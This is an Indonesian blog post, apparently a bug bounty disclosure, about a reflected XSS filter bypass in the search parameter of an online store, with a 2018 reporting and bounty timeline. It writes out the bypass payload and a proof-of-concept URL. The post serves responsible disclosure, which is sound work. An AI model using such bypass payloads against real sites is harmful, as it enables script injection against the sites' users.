Berikut POC XSS bypass filter yang saya temukan di blibli.com
URL :
https://www.blibli.com/jual/test?s=iphone
Celah exploit terdapat pada parameter "s", sedangkan payload untuk adalah sebagai berikut :
PAYLOAD :
lol<script>alert("XSS")</ script>">
POC :
https://www.blibli.com/jual/ lol-script-alert-xss-script?s= lol<script>alert("XSS")</ script>">
Untuk Timeline nya sebagai berikut :
- 19 - 02 - 2018 : Kirim Report ke team blibli.
- 13 - 03 - 2018 : Konfirmasi kembali ke team blibli karena tidak ada respon dan bug ternyata telah diperbaiki.
- 13 - 03 - 2018 : Pihak team blibli mengkonfirmasi bahwa bug tersebut berstatus duplicate, dan telah di temukan oleh tim internal dari blibli.
- 03 - 09 - 2018 : Berhasil bypass filter dan mengirimkan report kembali ke team blibli.
- 12 - 09 - 2018 : konfirmasi ulang status bug
- 13 - 09 - 2018 : konfirmasi ulang status bug, karena setelah di cek bug tersebut sudah diperbaiki.
- 19 - 09 - 2018 : Info dari team blibli akan memberikan bounty atas dasar penemuan ulang.
- 22 - 10 - 2018 Info dari team blibli akan memberikan bounty berupa voucher yang akan diberikan dalam waktu 1 minggu
nb : Untuk tulisan yang detail mengenai bypass xss di blibli akan saya tulis di blog selanjutnya, karena sewaktu tulisan ini terpublish, bug yang lain belum diperbaiki
No comments:
Post a Comment